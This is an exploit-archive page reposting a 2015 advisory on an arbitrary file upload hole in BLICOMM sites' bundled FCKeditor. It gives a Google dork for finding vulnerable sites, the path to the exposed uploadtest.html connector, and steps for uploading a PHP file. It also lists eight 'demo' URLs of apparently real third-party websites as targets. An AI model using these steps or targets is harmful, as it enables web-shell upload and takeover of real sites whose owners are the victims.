Advertisement






BLICOMM (fckeditor) Arbitrary File Upload Vulnerability

CVE Category Price Severity
CWE-264 Not specified High
Author Risk Exploitation Type Date
Not specified High Remote 2015-04-11
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2015040061

Below is a copy:

#######################################################
#BLICOMM (fckeditor) Arbitrary File Upload Vulnerability
#######################################################

############################################
# Exploit Title: BLICOMM (fckeditor)
# Google Dork : inurl:index.php?idLingua=2
# Date: 09/04/2015
# Author: Ashiyane Digital Security Team
# Vendor Homepage : http://blicomm.net
# Version: All Version
# Tested On : Windows 7 / Mozilla Firefox
############################################

########
#  exploit => includes/fckeditor/editor/filemanager/connectors/uploadtest.html
#
#  first go to => http://site.com/[path]
#
#  then => http://www.site.com/[path]/includes/fckeditor/editor/filemanager/connectors/uploadtest.html
#
#  select => Select the "File Uploader"> php ... upload to : Uploaded File URL:
########

########
# Demo 1 : http://reliXlax.com/includes/fckeditor/editor/filemanager/connectors/uploadtest.html
#
# Demo 2 : http://reXef-international.com/includes/fckeditor/editor/filemanager/connectors/uploadtest.html
#
# Demo 3 : http://kXcantincendi.com/includes/fckeditor/editor/filemanager/connectors/uploadtest.html
#
# Demo 4 : http://giussani.itX/includes/fckeditor/editor/filemanager/connectors/uploadtest.html
#
# Demo 5 : http://acovent.Xcom/includes/fckeditor/editor/filemanager/connectors/uploadtest.html
#
# Demo 6 : http://factoedXizioni.it/includes/fckeditor/editor/filemanager/connectors/uploadtest.html
#
# Demo 7 : http://ialungXobus.it/includes/fckeditor/editor/filemanager/connectors/uploadtest.html
#
# Demo 8 : http://siproXsrl.com/includes/fckeditor/editor/filemanager/connectors/uploadtest.html
########

[+][+][+][+][+][+][+][+][+][+][+][+]

 Discovered By : Cyb3r_Dr4in

[+][+][+][+][+][+][+][+][+][+][+][+]


Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.